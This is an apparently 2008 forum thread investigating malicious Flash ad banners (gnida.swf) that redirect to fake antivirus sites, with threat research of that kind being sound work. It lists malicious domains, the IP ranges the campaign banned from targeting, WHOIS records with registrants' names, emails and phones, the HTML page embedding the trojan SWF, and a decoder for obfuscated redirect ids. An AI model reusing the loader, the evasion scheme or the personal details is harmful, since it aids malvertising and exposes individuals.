quinquecahue.com/swf/gnida.swf?campaign=teachingor&u=1200504042
  • Reported at www.index.hr
  • Banned Country Code - States / Cities - IP Ranges
    70.84.0.0-70.84.255.255
    70.85.0.0-70.85.255.255
    209.85.0.0-209.85.255.255
    in, il
    texas, california, newyork
    dallas, mountainview, newyork
______________________________

quinquecahue.com/swf/gnida.swf?campaign=ifsequitur&u=1200654870
  • Reported at www.bridicum.com (CSIS Security Group).
  • Banned Country Codes - States / Cities - IP Ranges
    195.47.0.0-195.47.255.255
    84.16.255.255
    copenhagen
______________________________

traveltray.com/swf/gnida.swf?campaign=upmorpheus&u=1201009699
  • Reported at forum.zeusnews.com - forum.ingegneri.info.
  • Banned Country Codes - States / Cities - IP Ranges
    217.12.0.0-217.12.255.255 (Yahoo Europe)
    216.109.0.0-216.109.255.255 (us.rd.yahoo.com - 216.109.118.82)
    66.94.0.0-66.94.25.255 (f3.yahoofs.com - 66.94.226.22)
    UK
    california
    milano, milan, london, dublin, barcelona
In different countries (France, Italy ...) people complain about SWF redirects in their mailbox. If you are a victim of this, please contact us.
______________________________

03/02/2008

mysurvey4u.com/swf/gnida.swf?campaign=me9ntthe&u=1201951156171
  • Reported at forums.myspace.com/p/3747055/37526266.aspx?fuseaction=forums.viewpost
  • www.myspace.com IP :
______________________________

quinquecahue.com/swf/gnida.swf?campaign=atticismus&u=1201712577
  • Reported at www.hispamp3.com/foros
______________________________

quinquecahue.com/statsg.php?u=1200592645&campaign=ofquixotic
  • Reported at www.gaiaonline.com/forum/questions-assistance/ad-banner-infected-with-gnida-swf-trojan/t.37232985/
  • The IP address of gaiaonline.com is 72.5.72.7, so 72.5.0.0-72.5.255.255 will be in the banned list.
______________________________
Kimberly
<h4>
IP Resume
</h4>
190.15.64.185 - akamahi.net
190.15.64.186 - ? - GET /swf/gnida.swf = ok
190.15.64.187 - ? - GET /swf/gnida.swf = ok
190.15.64.188 - newbieadguide.com
190.15.64.189 - ? - GET /swf/gnida.swf = ok
190.15.64.190 - quinquecahue.com
190.15.64.191 - thetechnorati.com
190.15.64.192 - vozemiliogaranon.com

190.15.73.254 - blessedads.com
______________________________

194.110.67.22 - mysurvey4u.com
194.110.67.25 - workhomecenter.com
194.110.67.19 - casinoaceking.com
194.110.67.22 - getfreecar.com
______________________________

84.243.252.94 - traffalo.com
______________________________

Changed.

content.onerateld.com - sec.storageguardsoft.com

66.244.254.11
66.244.254.201
66.244.254.239
85.17.4.101
QUOTE
Network Whois record
Queried whois.arin.net with "66.244.254.11"...

OrgName: Big Pipe Inc.
OrgID: BGPP
Address: Suite 400
Address: 630 - 3rd Ave. SW
City: Calgary
StateProv: AB
PostalCode: T2P-4L4
Country: CA

ReferralServer: rwhois://204.209.209.80:4321

NetRange: 66.244.192.0 - 66.244.255.255
CIDR: 66.244.192.0/18
NetName: BIGPIPE-2
NetHandle: NET-66-244-192-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.BIGPIPEINC.COM
NameServer: DNS2.BIGPIPEINC.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-03-14
Updated: 2002-05-21

RTechHandle: ZB106-ARIN
RTechName: Big Pipe Inc
RTechPhone: +1-403-750-7428
RTechEmail: ipadmin_bigpipe@bigpipeinc.com

OrgAbuseHandle: BPA15-ARIN
OrgAbuseName: Shaw Business Solutions - Abuse
OrgAbusePhone: +1-866-244-7474
OrgAbuseEmail: abuse@shawbusinesssolutions.ca

OrgTechHandle: ZI94-ARIN
OrgTechName: Shaw Business Solutions
OrgTechPhone: +1-403-750-7428
OrgTechEmail: ipadmin@shawbusinesssolutions.ca

# ARIN WHOIS database, last updated 2008-02-03 19:03
# Enter ? for additional hints on searching ARIN's WHOIS database.

QUOTE
Network Whois record
Queried whois.ripe.net with "-B 85.17.4.101"...

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '85.17.4.0 - 85.17.4.255'

inetnum: 85.17.4.0 - 85.17.4.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to "abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050320
changed: ripe@ocom.com 20060608
source: RIPE

person: RIP Mean
address: P.O. Box 93054
address: 1090BB AMSTERDAM
address: Netherlands
phone: +31 20 3162880
fax-no: +31 20 3162890
abuse-mailbox: abuse@leaseweb.com
e-mail: ripe@ocom.com
nic-hdl: LSW1-RIPE
notify: ripe@ocom.com
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050607
changed: ripe@ocom.com 20060215
changed: ripe@ocom.com 20060608
source: RIPE

% Information related to '85.17.0.0/16AS16265'

route: 85.17.0.0/16
descr: LEASEWEB
origin: AS16265
remarks: LeaseWeb
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050311
changed: ripe@ocom.com 20070610
source: RIPE
______________________________

Failed to resolve hostname.

adtraff.com
burnads.com
netmediagroup.net
uniqads.com
traveltray.com
aheadad.com
______________________________

Update 9 Feb. 2008

They are up again, except aheadad.com

adtraff.com - 84.243.252.84
burnads.com - 84.243.252.85
netmediagroup.net - 84.243.252.91
uniqads.com - 84.243.252.97

traveltray - 194.110.67.23
Kimberly
<h4>
190.15.64.187 - ? - GET /swf/gnida.swf = ok
</h4>
Finally got a name for that IP.

entrerrenglonadura.com - 190.15.64.187

IP Location - Francisco Morazan - Tegucigalpa - Secure Hosting Ltd
Created: 2007-11-23
Expires: 2008-11-23
Name Server: NS1.ENTRERRENGLONADURA.COM
Name Server: NS2.ENTRERRENGLONADURA.COM


Domain Name : entrerrenglonadura.com

::Registrant::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Administrative Contact::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Technical Contact::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Name Servers::
ns1.entrerrenglonadura.com
ns2.entrerrenglonadura.com
ns3.entrerrenglonadura.com
ns4.entrerrenglonadura.com

::Dates & Status::
Created Date 2007-11-23 05:03:25 EST
Updated Date 2007-11-23 05:03:25 EST
Valid Date 2008-11-23 05:03:25 EST
Status ACTIVE

<h4>
human500.com - 71.18.200.75
</h4>
Another domain came out of the box while doing some research today.

human500.com/bin/tremor/statsg.php

Not the usual folder but let's take a peek at the statsg.php file anyway. Interesting stuff ... we do find our gnida.swf back. So that's another one to blacklist.

CODE
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></title>
</head>
<body bgcolor="#ffffff">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="200" height="200" id="gnida" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="swf/gnida.swf" />
<param name="menu" value="false" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<embed src="swf/gnida.swf" menu="false" quality="high" bgcolor="#ffffff" width="200" height="200" name="gnida" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
</body>
</html>

Website Title: Human500 Project
ICANN Registrar: GODADDY.COM, INC.
Name Server: NS5.IXWEBHOSTING.COM
Name Server: NS6.IXWEBHOSTING.COM
Whois Server: whois.godaddy.com

Server Type: Apache
IP Location - Kentucky - Hopkinsville - Ecommerce Corporation
Created: 2006-08-29
Expires: 2008-08-29
Registrar Status: clientDeleteProhibited
Registrar Status: clientRenewProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited

Whois Record
Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: HUMAN500.COM
Created on: 29-Aug-06
Expires on: 30-Aug-08
Last Updated on: 04-Sep-06

Administrative Contact:
Private, Registration
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2599

Technical Contact:
Private, Registration
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2599

Domain servers in listed order:
NS5.IXWEBHOSTING.COM
NS6.IXWEBHOSTING.COM

Related domains and mailservers

<h4>
Extra reading
</h4>
Inside Rogue Flash Ads, by Dennis Elser and Micha Pekrul, Secure Computing Corporation.
Kimberly
Every day new banners and / or websites show up, we all need your help.

<h4>
iexplorer-security.org - 84.252.148.219
</h4>
Server Type: gws
IP Location - Russian Federation - Mc Host.ru
Created: 2008-01-12
Expires: 2010-01-12
Whois Server: whois.pir.org
Dedicated Hosting: iexplorer-security.org is hosted on a dedicated server.

Domain ID:D150624483-LROR
Domain Name:IEXPLORER-SECURITY.ORG
Created On:12-Jan-2008 14:16:26 UTC
Last Updated On:15-Jan-2008 10:31:03 UTC
Expiration Date:12-Jan-2010 14:16:26 UTC
Sponsoring Registrar:EstDomains, Inc. (R1345-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

Name Server:MANAGEDNS1.ESTBOXES.COM
Name Server:MANAGEDNS2.ESTBOXES.COM
Name Server:MANAGEDNS3.ESTBOXES.COM
Name Server:MANAGEDNS4.ESTBOXES.COM

domains sharing nameservers.
  • 1vipstar.com
  • 2007postcards.com
  • abalmasov.com
  • absolute-space.net
  • actualbandwidth.net
  • albanino.com
  • anetwork.net
  • anothercoolpoint.net
  • antispygolden.com
  • archhistory.net
  • auto-zapchasti.com
  • awmutils.com
  • beloni.net
  • best4all.net
  • blindsearch.net
  • bodyresearch.net
  • carding666.com
  • central-office.net
  • classicmotiontheory.net
  • classicphyschapter.net
  • coherentsource.net
  • compromat.net
  • dolanare.com
  • egi-service.com
  • electricalimput.net
  • estexpired.com
  • estparking.com
  • fafind.com
  • fastmediaservice.com
  • fetisches.com
  • for-movies.net
  • funzor.net
  • garybrolsma.net
  • gayshunks.com
  • goldcoders.com
  • googlerankigs.com
  • hiramaxthumbs.com
  • hirosh.net
  • hitvirus.com
  • htraf.com
  • i-wns.com
  • joindreams.com
  • kar-textiles.com
  • klikfeed.com
  • klikrevenue.com
  • kompromat.net
  • kytoon.com
  • laser-modules.net
  • loguestbook.ws
  • lost-civilizations.net
  • loventity.com
  • lowbandwidth.net
  • lowscaleworld.net
  • malwareburn.com
  • miyana.org
  • modernworldview.net
  • mp3-planet.net
  • mpagii.org
  • negativenumber.net
  • nelroyltd.com
  • newmediadriver.com
  • newtonrealtime.net
  • nfodb.com
  • nfodb.org
  • nude-art.net
  • ofigeno.net
  • onlineheavytheory.net
  • opticalassemblies.net
  • paydir.com
  • peacedata.biz
  • pentarh.com
  • photonsstream.net
  • procodec.com
  • prozvon.info
  • rape-tgp.net
  • resurrect.net
  • sanek.info
  • slizen.com
  • softservice.us
  • spycut.com
  • spyhazard.com
  • stinger911.net
  • sunnysex.net
  • surfermail.net
  • synchrotronsbasic.net
  • ultralightbeam.net
  • vacuum-energy.net
  • vanix.net
  • videoforsex.com
  • videohook.com
  • virusheal.com
  • virusranger.com
  • wellcams.biz
  • wellcams.com
  • wz-mail.net
  • xl2.net
  • xpldev.net
  • xxl-cash.com
  • yeahsearch.net
  • zloy.net
  • zolotonio.com
  • zxc.net.ua
(only showing 100 results)

<h4>
adtds2.promoplexer.com - 217.20.175.74
</h4>
Domain Name: PROMOPLEXER.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Name Server: NS1.VICI.UA
Name Server: NS2.VICI.UA
Status: ok
Updated Date: 04-jan-2008
Creation Date: 05-nov-2007
Expiration Date: 05-nov-2008

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com

Domain Name: PROMOPLEXER.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Websites.
  1. Macsweeper.com
hostnames sharing ip with a-records.
  • macsweeper.com
  • ns1.cleanator.com
  • ns1.macsweeper.com
  • www.macsweeper.com
hostnames beginning with adtds2.
  • adtds2.maxconvert.com
domains using this as nameserver.
  • cleanator.com
  • macsweeper.com
<h4>
Promoplexer.com - 217.20.175.39
</h4>
Server Type: Apache/2.0.55 (Ubuntu) PHP/5.1.6
IP Address: 217.20.175.39
IP Location - Kyyiv - Kiev - W Net Isp
Created: 2007-11-05
Expires: 2008-11-05
Whois Server: whois.estdomains.com

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: PROMOPLEXER.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 05-Nov-2007
Expiration Date: 05-Nov-2008

Domain servers in listed order:
ns2.vici.ua
ns1.vici.ua

MX alt1.aspmx.l.google.com
64.233.167.27 gsmtp167.google.com
64.233.167.114 gsmtp167-2.google.com

MX alt2.aspmx.l.google.com
209.85.133.27 an-in-f27.google.com
209.85.133.114 an-in-f114.google.com

MX aspmx.l.google.com
66.249.93.27 gsmtp93.google.com
66.249.93.114 gsmtp93-2.google.com

Websites.
  1. Maxconvert.com
  2. Promoplexer.com
hostnames sharing ip with a-records.
  • maxconvert.com
  • usin-39.colo2.kv.wnet.ua
domains sharing mailservers.
  • 27kb.se
  • 27kilobyte.se
  • 2friend.com
  • 2hc.org
  • aanetwork.net
  • aaronfitz.info
  • abadox.biz
  • access9.net
  • adaeuro.com
  • admugio.com
  • akanea.com
  • alikadic.com
  • alisaglam.com
  • alpha-lab.net
  • altafandaltaf.com
  • annie-and-rob.com
  • applinet.com.ar
  • araos.cl
  • atleticano.com
  • backwardslogic.com
  • bertelson.us
  • bhtele.com
  • bigfang.com
  • bios-sport.com
  • black-panther.us
  • bodyextreme.com
  • bouallou.com
  • caeluspartners.com
  • cainelli.com.ar
  • calebchen.com
  • catalystic.net
  • cetin.org
  • chadcwaters.com
  • chaisong.com
  • chrisk.com
  • cintriq.com
  • cintron.org
  • claman.net
  • clsrock.com
  • codycrew.com
  • coimbatorian.com
  • complementar.net
  • consys.net
  • copteaser.com
  • corrientesaldia.com.ar
  • cowmoo.net
  • creamedhoney.com
  • cynicalgeeks.com
  • deathbylogic.com
  • decoma.com.au
  • dixonz.com
  • drbullock.com
  • droegemueller.net
  • durabull.co.uk
  • duran.org.ar
  • echiu.com
  • edgarfamily.net
  • ehven.com
  • elizabethsinteriors.com
  • elliott.uk.com
  • empathy.net
  • enhanceit.com.au
  • enthrone.net
  • etzich.net
  • evilcode.com
  • evylle.com
  • fazisse.com
  • fedro.com
  • feuer.ca
  • fought.net
  • fragzone.se
  • fremonianindustries.com
  • fupot.com
  • fz.se
  • galo.net
  • geenstijl.nl
  • globalconvergence.net
  • goldenidol.net
  • gsesoft.com
  • hackers.net.ua
  • hakaveret.co.il
  • halladaytrees.com
  • hanareha.com
  • hangglide.com.au
  • hassall.id.au
  • hireright.us
  • homiez.net
  • horstmeier.org
  • housingcounseling.net
  • ictoan.net
  • ifesgulf.com
  • immutable.org
  • inner-circle.org
  • iridia.nl
  • irken.net
  • jamclam.us
  • jclayconstruction.com
  • jeffsmall.com
  • joshua.net
  • juntera.com
  • justasisuspected.com
  • kathymike.com
(only showing 100 results)

domains sharing nameservers.
  • adsraise.com
  • clenator.com
  • kivvisoftware.com
  • maxconvert.com
subdomains.
  • *.promoplexer.com
  • adtds2.promoplexer.com
Kimberly
As mentioned by Sandi, a couple of new banners have caught our eye. We notice a change in the URLs of the redirects.

Before.

[domain]/statsa.php?u=[date/time stamp]&campaign=[campaign name]

Example:
  • quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni
Now.

[domain]/c/index.php?id=[encrypted string]

Examples:
  • station-appraisals.com/c/index.php?id=WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xmYgYNkiDgNmYNkiDgNm
  • staticglobalsources.net/c/index.php?id=m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252dGE9bmV0aHpyYWdim7NkiZQYNkiDgNmYNkiDgNm
Let's take the 2 latecomers apart since they reveal some new domains.
  1. station-appraisals.com/c/index.php?id=WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xmYgYNkiDgNmYNkiDgNm
    blessedads.com/?cmpid=identifyso
    antivirusforall.com/?tmn=av5&gai=identifyso&gli=&3&mt_info=5586_5581_4577

  2. staticglobalsources.net/c/index.php?id=m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252dGE9bmV0aHpyYWdim7NkiZQYNkiDgNmYNkiDgNm
    waytotheprofit.com/?cmpid=argumentor
New domains.
  1. station-appraisals.com
  2. staticglobalsources.net
  3. waytotheprofit.com
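Added note, not part of Kimberly's post: working through the two id values quoted above, the "encrypted string" turns out to be plain base64 around a rot13-scrambled query string, padded with filler runs (m7Nki inserted in the second id, YNkiDgNm appended twice to both). The filler tokens and the rot13 layer are my own observation from these two samples only, so treat them as an assumption for any other id. The decoder below is my own code (not from the post or from the ad network); it recovers a Unix timestamp and the campaign name, and that name matches the cmpid seen on the landing pages (identifyso, argumentor):

```python
"""Decode the id= parameter of the /c/index.php?id=... redirect URLs."""
import base64
import codecs
from datetime import datetime, timezone
from urllib.parse import parse_qsl

# The two ids exactly as quoted in the post.
ID_STATION = ("WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9"
              "dnFyYWd2c2xmYgYNkiDgNmYNkiDgNm")
ID_STATIC = ("m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzIm"
             "cG56Y252dGE9bmV0aHpyYWdim7NkiZQYNkiDgNmYNkiDgNm")

# Filler runs seen in the two samples. Assumption: other ids may use
# different filler, so pass your own tuple if the decode fails.
FILLER = ("m7Nki", "YNkiDgNm")


def decode_redirect_id(raw, filler=FILLER):
    """Strip filler, base64-decode, undo rot13 and parse the query string.

    Returns a dict with the campaign name, the embedded Unix timestamp,
    its UTC rendering and the recovered query string.
    """
    s = raw
    for token in filler:
        s = s.replace(token, "")
    # Filler removal leaves an unpadded base64 string; restore '=' padding.
    plain = base64.b64decode(s + "=" * (-len(s) % 4)).decode("latin-1")
    # Letters are rot13-scrambled: 'pnzcnvta' is 'campaign', digits and
    # '&'/'=' are untouched, so the whole string can be rotated at once.
    query = codecs.decode(plain, "rot13")
    params = dict(parse_qsl(query))
    # The first pair has an opaque key; its value is a Unix timestamp,
    # the same 'u=' stamp the old statsa.php URLs carried in the clear.
    _opaque_key, stamp_text = next(iter(params.items()))
    stamp = int(stamp_text)
    return {
        "campaign": params.get("campaign"),
        "stamp": stamp,
        "when": datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat(),
        "query": query,
    }


if __name__ == "__main__":
    for label, value in (("station-appraisals.com", ID_STATION),
                         ("staticglobalsources.net", ID_STATIC)):
        info = decode_redirect_id(value)
        print(label, info["when"], "campaign=" + str(info["campaign"]))
```

The timestamps (12 Feb 2008 and 26 Feb 2008) line up with the dates on which these banners were spotted, and the campaign names are the same strings the landing pages receive as cmpid, which is what links a banner to the affiliate behind it.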
<h4>
waytotheprofit.com - 76.74.249.30
</h4>
It's very easy to link this domain to the other players. We notice that blessedads.com and prevedmarketing.com share the same IP with waytotheprofit.com. Colored in orange, domains which did share nameservers with newbieadguide.com (post #4 - Closest Relationships). As a matter of fact, all were hosted on 190.15.73.254 at that time except deuspayment.com.

Websites.
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adnetserver.com
  6. Adredired.com
  7. Adsolutio.com
  8. Adverdaemon.com
  9. Adverlounge.com
  10. Adzyclon.com
  11. Astalaprofit.com
  12. B2adz.com
  13. Bizadverts.com
  14. Bizmarketads.com
  15. Blessedads.com
  16. Brandmarketads.com
  17. Bucksbill.com
  18. Deuspayment.com
  19. Friedads.com
  20. Glorymarkets.com
  21. Iddqdmarketing.com
  22. Intervarioclick.com
  23. Invulnerableads.com
  24. Luckyadcoin.com
  25. Luckyadsols.com
  26. Moneycometrue.com
  27. Mythmarketing.com
  28. Popadprovider.com
  29. Prevedmarketing.com
  30. Rocktheads.com
  31. Sharpadverts.com
  32. Shivanetworking.com
  33. Waytotheprofit.com
Domain Name: WAYTOTHEPROFIT.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.WAYTOTHEPROFIT.COM
Name Server: NS2.WAYTOTHEPROFIT.COM
Status: ok
Updated Date: 03-mar-2008
Creation Date: 02-jul-2007
Expiration Date: 02-jul-2009

Domain : waytotheprofit.com

Registrant Contact Information :
Hostmaster Inc.
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE

Admin Contact Information :
Donna V. Reed, Donna no_name_inc(at)yahoo.com
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE
1-555-555-1234

Tech Contact Information :
Donna V. Reed, Donna no_name_inc(at)yahoo.com
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE
1-555-555-1234

Billing Contact Information :
Contact is identical to Admin

Name Server: NS2.WAYTOTHEPROFIT.COM - 76.74.249.28
Name Server: NS1.WAYTOTHEPROFIT.COM - 76.74.249.29

hostnames sharing ip with a-records & domains sharing nameservers.
  • ad2profit.com
  • adgurman.com
  • adredired.com
  • adsolutio.com
  • astalaprofit.com
  • bizmarketads.com
  • brandmarketads.com
  • iddqdmarketing.com
  • intervarioclick.com
  • invulnerableads.com
  • luckyadcoin.com
  • luckyadsols.com
  • mythmarketing.com
subdomains.
  • *.waytotheprofit.com
  • mail.waytotheprofit.com
  • ns1.waytotheprofit.com
  • ns2.waytotheprofit.com
QUOTE
Queried whois.arin.net with "!NET-76-74-248-0-1"...

OrgName: ServerBeach
OrgID: SERVER-17
Address: 8500 Vicar Drive 8500, Suite 500
City: San Antonio
StateProv: TX
PostalCode: 78218
Country: US

NetRange: 76.74.248.0 - 76.74.255.255
CIDR: 76.74.248.0/21
NetName: PEER1-SERVERBEACH-08A
NetHandle: NET-76-74-248-0-1
Parent: NET-76-74-128-0-1
NetType: Reallocated
NameServer: NS1.SERVERBEACH.COM
NameServer: NS2.SERVERBEACH.COM
Comment:
RegDate: 2007-12-05
Updated: 2007-12-05

RTechHandle: HOSTM325-ARIN
RTechName: Hostmaster
RTechPhone: +1-210-225-4725
RTechEmail: hostmaster(at)serverbeach.com

OrgAbuseHandle: SNAE-ARIN
OrgAbuseName: Serverbeach Network AUP Enforcement
OrgAbusePhone: +1-604-484-2588
OrgAbuseEmail: abuse(at)serverbeach.com

OrgTechHandle: ZZ4092-ARIN
OrgTechName: ipadmin
OrgTechPhone: +1-210-225-4725
OrgTechEmail: ipadmin(at)serverbeach.com

# ARIN WHOIS database, last updated 2008-03-11 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

ServerBeach ....

<h4>
station-appraisals.com - 81.93.56.86
</h4>
Looking at the shared nameservers, it's easy to link station-appraisals.com to the other actors.

Domain Name: STATION-APPRAISALS.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATION-APPRAISALS.COM
Name Server: NS2.STATION-APPRAISALS.COM
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

Domain : station-appraisals.com

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

Admin Contact Information :
Contact is identical to Registrant

Tech Contact Information :
Contact is identical to Admin

Billing Contact Information :
Contact is identical to Admin

NS1.STATION-APPRAISALS.COM - 202.75.35.72
NS2.STATION-APPRAISALS.COM - 58.65.238.170

hostnames beginning with station-appraisals.
  • station-appraisals.net
domains sharing nameservers.
  • aboutstat.com
  • akamahi.net
  • entrerrenglonadura.com
  • newstat.net
  • officialstat.com
  • quinquecahue.com
  • stat-diagnostic-imaging.net
  • stathisranch.net
  • staticglobalsources.com
  • station-appraisals.net
  • statnation.net
  • thetechnorati.com
  • vozemiliogaranon.com
subdomains.
  • *.station-appraisals.com
  • ns1.station-appraisals.com
  • ns2.station-appraisals.com
station-appraisals.net - 81.93.56.87
ns1.station-appraisals.net - 202.75.35.72
ns2.station-appraisals.net - 58.65.238.170

<h4>
staticglobalsources.net - 81.93.56.85
</h4>
Domain Name: STATICGLOBALSOURCES.NET
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATICGLOBALSOURCES.NET
Name Server: NS2.STATICGLOBALSOURCES.NET
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

Domain : staticglobalsources.net

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

Admin Contact Information :
Contact is identical to Registrant

Tech Contact Information :
Contact is identical to Admin

Billing Contact Information :
Contact is identical to Admin

Name Server: NS1.STATICGLOBALSOURCES.NET - 202.75.35.72
Name Server: NS2.STATICGLOBALSOURCES.NET - 58.65.238.170

hostnames beginning with staticglobalsources.
  • staticglobalsources.com
domains sharing nameservers
  • aboutstat.com
  • akamahi.net
  • entrerrenglonadura.com
  • newstat.net
  • officialstat.com
  • quinquecahue.com
  • stat-diagnostic-imaging.net
  • stathisranch.net
  • station-appraisals.com
  • station-appraisals.net
  • statnation.net
  • thetechnorati.com
  • vozemiliogaranon.com
subdomains.
  • *.staticglobalsources.net
  • ns1.staticglobalsources.net
  • ns2.staticglobalsources.net
staticglobalsources.com - 81.93.56.84
ns1.staticglobalsources.com - 202.75.35.72
ns1.staticglobalsources.com - 202.75.35.72

<h4>
checking c-net 81.93.56.*
</h4>
81.93.56.72 aboutstat.com A
81.93.56.74 newstat.net A
81.93.56.75 officialstat.com A
81.93.56.78 stat-diagnostic-imaging.net A
81.93.56.82 stathisranch.net A
81.93.56.84 staticglobalsources.com A
81.93.56.85 staticglobalsources.net A
81.93.56.86 station-appraisals.com A
81.93.56.87 station-appraisals.net A
81.93.56.88 statnation.net A
81.93.56.91 statsla.net A
81.93.56.98 mail.mailindustries.eu PTR A - mailindustries.eu A

Why am I not surprised that all those domains except 81.93.56.98 belong to Serg Moon?

DomainTools reveals the following info:

"Serg Moon" owns about 19 other domains
moon.serg@gmail.com is associated with about 28 domains
Something I learned a long time ago .... "poke around" in the closest ranges.

checking c-net 81.93.55.*

One did catch my eye in that block because it's hosted on a nginx/0.4.13 server.

81.93.55.178 - statworld.net

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

81.93.55.176-81.93.55.183 NL-CUST-DENIT-ID-11372 Denit NL Customer with ID 11372

So I think it's safe to presume that all those IPs belong to Serg Moon also. They will have my full attention in the next days.

<h4>
Denit Internet Services
</h4>
% Information related to '81.93.48.0 - 81.93.63.255'

inetnum: 81.93.48.0 - 81.93.63.255
org: ORG-DIS2-RIPE
admin-c: DIT8723-RIPE
netname: NL-DENIT-20060508
descr: Denit Internet Services
country: NL
tech-c: DIT8723-RIPE
status: ALLOCATED PA
notify: ripe@denit.nl
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: DENIT-IS-MNT
mnt-routes: DENIT-IS-MNT
changed: hostmaster@ripe.net 20060508
changed: bitbucket@ripe.net 20080125
source: RIPE

organisation: ORG-DIS2-RIPE
org-name: Denit Internet Services
org-type: LIR
address: Denit Internet Services B.V.
Contactweg 131
1014 BJ Amsterdam
NETHERLANDS
phone: +31 20 3372560
fax-no: +31 20 3371802
e-mail: ripe@denit.nl
admin-c: EVER1-RIPE
admin-c: SIMO-RIPE
mnt-ref: DENIT-IS-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
changed: hostmaster@ripe.net 20040415
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
